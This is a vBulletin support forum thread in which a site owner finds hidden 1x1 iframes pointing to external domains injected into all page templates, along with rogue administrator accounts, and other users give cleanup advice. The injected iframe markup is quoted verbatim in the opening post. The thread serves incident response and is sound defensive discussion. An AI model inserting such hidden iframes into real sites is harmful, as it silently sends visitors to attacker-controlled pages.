![]() |
iframe injected into all templates
I have searched Google and have found a couple of forums suffering the same fate.
Today all of a sudden I noticed my pages loading slow so i looked at the code. I see a iframe at the bottom of all my pages: Code:
<iframe src="http://damnxd.org/dns.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://www.jobless-jack.com/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> --------------- Added [DATE]1378334265[/DATE] at [TIME]1378334265[/TIME] --------------- I am running version 4.2.0 by the way. |
You may want to check your templates and see if you were hacked and someone added it into your templates.
|
Quote:
|
Ok next step is to disable all plugins to see if it is coming from there.
Open your config.php and below<?php add this line: PHP Code:
PHP Code:
|
If you have vBSEO installed this is very likely, could also be from the recently discovered install directory exploit we are unsure without actually investigating it ourselves.
Try running the queries listed on my blog post scroll down to find "Run the following Queries in phpMyAdmin" and do so - http://www.vbulletin.com/forum/blogs...vbulletin-site Some basics:
|
Thanks Mike, I knew I seen that somewhere before, I just could not for the life of me remember where it was.
|
Quote:
|
Disabling Hooks does nothing, the iframe stays.
Superman I do not have vBSEO installed, However i will read the post you provided and report back. |
Hmmm then it may be in the files somewhere, if it is not in the templates or plugins. Let us know what you come up with after following the post.
|
I have 4 new administrator in my admin group. All hackers.
|
Ouch, you need to find out how they got in.
|
Delete your install directory
|
Quote:
*Also who is your host? No name required I simply ask as some do backups free of charge some daily, some do hourly backups and they may have one handy and can simply restore the site to just before the time of being hacked - if that is the case you will lose all posts/info since said time but you'll go back to the point before infection where your safe to assume it's clean, then the objective at that time would be to rid yourself of any possible exploits such as removing the /install/ directory and checking for suspect file versions etc. |
This username appeared 4 times in the admin group:
Th3H4ck |
Quote:
*Stop for one second though and reply to my backup question above ^ Do you have a recent backup? If so its better to restore and nip any possible exploits in the bud. If no backups then continue on investigating and clearing out any malicious code/files/other. Edit: I'm taking the family out to dinner but will check this when I return as I have work to do tonight regardless ;). |
Quote:
--------------- Added [DATE]1378338074[/DATE] at [TIME]1378338074[/TIME] --------------- Quote:
|
You'll need to dig into the db, even though its a iframe, he could have it hidden in a base64 code thats decoding into the iframe.
This could be hidden in numerous tables of your db, datastore, plugins, styles etc. |
Quote:
|
I wasnt suggesting files, i suggested in your db.
|
You make sure there are no unknown files in your vBulletin directory. You can use Maintenance --> Diagnostic --> Suspect File Versions to find these.
|
Quote:
|
I dunno if I would delete it, maybe rename it to x_settings to make sure it is not supposed to be used by a mod or something. Then check your site and see if the iframe is still in the footer.
|
Quote:
|
vb4 uses setting, not settings, if the only entry in that table is the iframe, id nuke it after backing it up.
But he has to be calling that table & setting, you may have more to inspect than just that. |
Quote:
|
Try this https://vborg.vbsupport.ru/showthread.php?t=265866
Backup your db first. Manually editing your datastore can be tricky. |
Quote:
Thanks! I still have no idea how I was hacked but apparently they couldn't do much. they didnt even edit my config file. I changed all passwords Installed admin panel firewall and ran the hack fix that seems to have done the trick. |
Welcome
|
Glad to hear it is gone for now, hopefully it won't come back. Maybe they got one of the admin passwords or something, or it could have come from one of your mods, make sure hey are all up to date.
--------------- Added [DATE]1378344772[/DATE] at [TIME]1378344772[/TIME] --------------- I would also recommend installing this mod, https://vborg.vbsupport.ru/showthrea...ght=vbsecurity |
Quote:
--------------- Added [DATE]1378345346[/DATE] at [TIME]1378345346[/TIME] --------------- |
Did you have your install directory still on the site, if you havent removed it already, remove it now.
--------------- Added [DATE]1378345705[/DATE] at [TIME]1378345705[/TIME] --------------- Its best to htaccess protect your admincp & modcp after renaming them, not using a hack to do it. |
Quote:
|
Quote:
So long as you delete the entire directory as you noted, you won't be subject to the exploit within. Please note: If at anytime in the future an issue arises such as your admin account messing up or issues with cookies and you need to use tools.php to reset any of it, you will need to re-upload the /install/ directory (do not re-upload install.php or upgrade.php) then run tools.php to sort the issue then promptly delete the entire directory once again. <-- This is only required in the event you need to run tools.php as it requires the install directory to be present. |
Hello,
I came to know of this exploit and looks like we too had this attack, we did the below: 1.Deleted install folder 2. Deleted suspicious admin user accounts 4. Refer thread - https://vborg.vbsupport.ru/showthread.php?t=301892 as mentioned there I didn't have any Iframe injection , but there was a line added in the "header" template of one of our custom style that reads as "Kindly delete "install" directory of your forums. Otherwise you will keep getting hacked" and the suspicious lines were removed. Also we notice that few templates in the custom style has edit history that says "Edited by .." the suspicious admin accounts with time stamp in the past year 2010. Is there any other precautions that need to be done. Am I currently still exploited? What are the other security measures that I need to do to protect my forums. |
Hi everyone,
I am encountering a similar problem forums/forum.php. It seems only forum.php is affected. This is what is displayed "DzPhoeniX Here :P | PS :: Don't Mind Just kidding ;) " Other pages are fine. If I log in as administrator, forum.php loads correctly. After some investigations in the admin logs, I found admin users created and logs show this: https://vborg.vbsupport.ru/external/2013/09/13.jpg https://vborg.vbsupport.ru/external/2013/09/14.jpg I have already disabled those accounts but would like to know how to resolve the issue other than a database restore. It seems there could be a plugin or a template edit. A search for "DzPhoenix" in templates led me to FORUMHOME which was blank except for the line above. I thus restored FORUMHOME back to its original state and everything seems fine again. Is there anything else I should check on? I'm a bit worried about the references to plugins above and would appreciate any help on this. |
All times are GMT. The time now is 07:39 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
![]() |
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|